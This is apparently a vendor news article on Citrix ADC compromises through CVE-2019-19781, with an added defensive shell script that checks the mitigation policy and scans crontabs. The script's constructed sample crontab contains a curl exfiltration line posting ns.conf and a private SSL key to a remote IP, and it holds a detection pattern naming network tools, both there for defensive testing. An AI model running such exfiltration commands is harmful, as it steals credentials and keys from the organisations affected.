Organisations urged to review systems after a raft of cyber-attacks

ORGANISATIONS that did not follow the recommended mitigation strategy for the Citrix vulnerability CVE-2019-19781 need to urgently review the security of their Citrix ADCs.

The warning follows a wave of companies found to have been attacked through this vulnerability without detecting it.

Although Citrix first notified customers of this vulnerability in December 2019, there are still major organisations, in both the public and private sectors, that have been impacted by it and remain at risk.

Dan Challinor, Axess Systems’ in-house Cyber Security Specialist, said: “When Citrix released the security notice, it contained mitigation steps consisting of a rewrite action and a responder policy, which they advised should be applied as soon as possible to eliminate any threat.”

However, not all organisations followed these prescribed steps, which, according to Dan, gave attackers an opportunity to exploit the vulnerability and gain access to data and systems.

He said: “Citrix advised that any ADC that didn’t have the mitigation policy applied to it before January 9th, 2020 should be considered as having been breached due to this vulnerability.

“What I have seen is that, rather than following this and rebuilding the ADC environment, organisations applied only the mitigation as advised by Citrix.

“This has resulted in organisations not realising that their Citrix ADC appliances have been compromised and that backdoors have been created on the Gateways to allow attackers access, even though the original vulnerability had been mitigated.

“These ‘backdoors’ allow attackers to maintain a persistent connection into the Citrix ADC appliances. From here, they could enumerate the IT infrastructure, looking for other systems with vulnerabilities or other avenues of attack such as accounts with weak passwords to escalate their privileges within the company’s IT Infrastructure. 

“Another form of data loss observed on compromised ADC appliances was scheduled tasks (cronjobs) created on them which would send the configuration files and the SSL certificates and their keys to web servers in foreign countries. These configuration files can be used to obtain the passwords used for LDAP and RADIUS authentication, which can easily be cracked, and captured data could be decrypted using the SSL certificate keys.

“We have also found that, in companies which have been compromised in this way and have applied the mitigation, these backdoors have not been discovered when the companies were scanned for vulnerabilities and penetration tested, and that businesses have not noticed the data being leaked from the Citrix ADC appliances.”
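Two things follow from the account above: first, an appliance must be checked for whether the Citrix responder policy is actually present and bound, not merely added; second, because the mitigation does nothing about persistence that was planted before it, the appliance's crontabs need to be reviewed for jobs that read the configuration or SSL keys and push them off-box. The script below is an added example written for this article; it is not code from Citrix or Axess Systems. It assumes the ADC's saved configuration is at /nsconfig/ns.conf and its FreeBSD crontabs at /etc/crontab and /var/cron/tabs/*; the sample ns.conf reproduces the responder policy from Citrix's mitigation article (CTX267679) as recalled here, so verify the expression against the article before relying on it. The sample configs and crontab lines are constructed for the demonstration and are not real appliance output.

```shell
#!/bin/sh
# Post-mitigation review helpers for a Citrix ADC/Gateway (CVE-2019-19781).
# Added example for this article; assumptions: ns.conf at /nsconfig/ns.conf,
# crontabs at /etc/crontab and /var/cron/tabs/* (FreeBSD layout).

# Returns 0 when a responder policy covering "/vpns/" plus "/../" exists AND
# is bound globally with -type REQ_OVERRIDE; returns 1 otherwise. A policy
# that was added but never bound (a common half-applied state) fails.
check_mitigation() {
    conf="$1"
    names=$(grep -E '^add responder policy ' "$conf" \
            | grep -F '/vpns/' | grep -F '/../' | awk '{print $4}') || true
    if [ -z "$names" ]; then
        echo "NOT MITIGATED: no responder policy for /vpns/ traversal in $conf"
        return 1
    fi
    for n in $names; do
        if grep -E "^bind responder global $n .*-type REQ_OVERRIDE" "$conf" >/dev/null; then
            echo "MITIGATED: policy $n bound globally (REQ_OVERRIDE) in $conf"
            return 0
        fi
    done
    echo "NOT MITIGATED: policy present but not bound with REQ_OVERRIDE in $conf"
    return 1
}

# Prints non-comment crontab lines that touch the saved config / SSL key
# directory or invoke a network client (curl, wget, fetch, nc, ncat, scp).
# Returns 0 if any such line exists (review each hit), 1 if none.
find_cron_exfil() {
    tab="$1"
    hits=$(grep -v '^[[:space:]]*#' "$tab" \
           | grep -E '/nsconfig/(ns\.conf|ssl)|/flash/nsconfig|(^|[[:space:]/])(curl|wget|fetch|nc|ncat|scp)[[:space:]]') || true
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
    return 0
}

# ---- constructed samples (not real appliance output) -----------------------
WORK=$(mktemp -d)
MITIGATED_CONF="$WORK/ns.conf.mitigated"
UNBOUND_CONF="$WORK/ns.conf.unbound"
PLAIN_CONF="$WORK/ns.conf.plain"
BAD_TAB="$WORK/crontab.bad"
CLEAN_TAB="$WORK/crontab.clean"

# Citrix-published policy as recalled; verify against CTX267679.
cat >"$MITIGATED_CONF" <<'EOF'
enable ns feature LB SSL SSLVPN RESP
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
EOF
# Same policy added but the bind step was skipped.
grep -v '^bind responder global' "$MITIGATED_CONF" >"$UNBOUND_CONF"
# No mitigation at all.
printf 'enable ns feature LB SSL SSLVPN\n' >"$PLAIN_CONF"

# Attacker-style persistence: posts ns.conf and a private key to a remote
# host every ten minutes (198.51.100.23 is a documentation address).
cat >"$BAD_TAB" <<'EOF'
# constructed sample crontab
*/10 * * * * nobody /usr/bin/curl -s -F 'f=@/nsconfig/ns.conf' -F 'k=@/nsconfig/ssl/ns-server.key' http://198.51.100.23/up.php
EOF
printf '0 * * * * root /usr/sbin/newsyslog\n' >"$CLEAN_TAB"

# Exercise the checks on the samples.
check_mitigation "$MITIGATED_CONF"
check_mitigation "$UNBOUND_CONF" || true
check_mitigation "$PLAIN_CONF" || true
find_cron_exfil "$BAD_TAB" || echo "no suspicious cron entries in $BAD_TAB"
find_cron_exfil "$CLEAN_TAB" || echo "no suspicious cron entries in $CLEAN_TAB"

# On a real appliance, from the ADC shell ("shell" at the nscli prompt):
#   check_mitigation /nsconfig/ns.conf
#   for t in /etc/crontab /var/cron/tabs/*; do [ -f "$t" ] && find_cron_exfil "$t"; done
```

A clean result from these two checks is necessary but not sufficient: a cron entry is only one persistence mechanism, so an appliance that was exposed before the policy was bound should still be treated as compromised and rebuilt, as the article's own advice says, rather than cleared on the strength of a grep.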

We are proud to be a Citrix Gold Solution Advisor, working with large-scale organisations (including NHS Trusts, finance companies and emergency services) and medium-sized businesses to improve security and workspaces, prevent data loss, and implement hybrid cloud and networks.

Heath Roberts, Axess Systems’ Operations Director, added: “We recently took over the Citrix support, monitoring and consultancy of five organisations. In all bar one, when we initiated our Citrix Security Service, we found not only that attackers had exploited this vulnerability, but that it was active.

“And these were not small organisations. They all have in-house security teams and have regular external penetration tests which had not spotted that this exploit was being used.

“Our Citrix Security Service protects our clients with regular scans, monitoring, health checks and reviews built on over 20 years of Citrix experience.

“And I would strongly urge everyone to check their ADCs were mitigated properly in line with the guidance issued by Citrix at the time.”

If you need any assistance with implementing these checks for your organisation, please contact 01773 882602.